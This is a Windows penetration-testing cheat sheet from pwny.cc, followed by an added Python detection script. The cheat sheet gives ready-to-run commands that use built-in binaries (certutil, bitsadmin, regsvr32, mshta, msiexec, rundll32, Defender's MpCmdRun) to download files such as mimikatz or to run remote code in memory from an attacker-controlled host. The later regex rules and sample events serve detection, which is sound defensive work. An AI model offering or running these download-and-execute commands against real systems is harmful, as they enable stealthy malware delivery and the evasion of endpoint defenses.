pwny.cc
Exfiltration

Download files from CMD/powershell

#Curl
curl http://10.10.10.19:8000/file.exe --output file.exe

#CertUtil
certutil.exe -urlcache -f http://10.10.10.19/file.exe file.exe

#Wget (alias of Invoke-WebRequest in Windows PowerShell)
Invoke-WebRequest -Uri "http://10.10.10.19" -OutFile "C:\path\file"

#Powershell
powershell -c (New-Object Net.WebClient).DownloadFile('http://10.10.10.19/file', 'output-file')

#Bitsadmin
bitsadmin /transfer n http://10.10.10.19/imag/evil.txt d:\test\1.txt

#Wmic
wmic os get /FORMAT:"http://10.10.10.19/evil.xsl"

#Windows Defender
"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url http://10.10.10.19/mimikatz.zip -path .\\mimikatz.zip

Execute code without downloading files locally

#Powershell
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.19/evil.txt'))"

#Rundll
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://10.10.10.19:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

#Regsvr32
regsvr32.exe /u /n /s /i:http://10.10.10.19:8888/file.sct scrobj.dll

#Msiexec
msiexec /q /i http://10.10.10.19/evil.msi

#Mshta
mshta http://10.10.10.19/run.hta

Data Exfiltration

#CertUtil: ENCODE file in base64
certutil -encode file outputfile.b64

#CertUtil: DECODE file in base64
certutil -decode file.b64 outputfile

Zip/Unzip files

#Powershell
Compress-Archive in.txt out.zip  #zip
Expand-Archive out.zip  #unzip
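
For defenders, the commands listed on this page share a recognizable shape: a built-in Windows binary invoked with a remote URL or an encode/decode switch. The following added example (not part of the original page) matches that shape in process-creation command lines; the rule names, regex patterns and sample events are constructed for illustration.

```python
import re

# Rules keyed to the commands on this page: a built-in Windows binary plus the
# argument pattern that makes it fetch or run remote content. Rule names and
# patterns are illustrative assumptions, not a vendor ruleset.
URL = r"https?://"
RULES = [
    ("certutil_urlcache",  r'\bcertutil(\.exe)?\b.*[-/]urlcache\b.*' + URL),
    ("certutil_base64",    r'\bcertutil(\.exe)?\b.*[-/](encode|decode)\b'),
    ("bitsadmin_transfer", r'\bbitsadmin(\.exe)?\b.*/transfer\b.*' + URL),
    ("wmic_remote_xsl",    r'\bwmic(\.exe)?\b.*/format:\s*"?' + URL),
    ("mpcmdrun_download",  r'\bmpcmdrun(\.exe)?\b.*-downloadfile\b'),
    ("ps_webclient",       r'\bpowershell(\.exe)?\b.*net\.webclient.*download(file|string)'),
    ("rundll32_script",    r'\brundll32(\.exe)?\b\s+javascript:'),
    ("regsvr32_scrobj",    r'\bregsvr32(\.exe)?\b.*/i:' + URL + r'.*scrobj\.dll'),
    ("msiexec_remote",     r'\bmsiexec(\.exe)?\b.*/i\s+"?' + URL),
    ("mshta_remote",       r'\bmshta(\.exe)?\b\s+"?' + URL),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]

def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]

def triage(events):
    """Keep only events that hit at least one rule, paired with their hits."""
    return [(e, classify(e)) for e in events if classify(e)]

# Constructed process-creation command lines (lab address taken from the page).
SAMPLE_EVENTS = [
    r'certutil.exe -urlcache -f http://10.10.10.19/file.exe file.exe',
    r'certutil -hashfile file.exe SHA256',            # benign: no rule fires
    r'regsvr32.exe /u /n /s /i:http://10.10.10.19:8888/file.sct scrobj.dll',
    r'msiexec /i C:\installers\app.msi /qn',          # benign: local package
    r'MSIEXEC /q /i http://10.10.10.19/evil.msi',     # case-insensitive match
    r'wmic os get Caption /format:list',              # benign: built-in format
    r'mshta http://10.10.10.19/run.hta',
]

if __name__ == "__main__":
    for event, hits in triage(SAMPLE_EVENTS):
        print(f"{', '.join(hits):20} {event}")
```

Invoke-WebRequest run inside an existing PowerShell session leaves no process command line, so it needs script block logging rather than these rules.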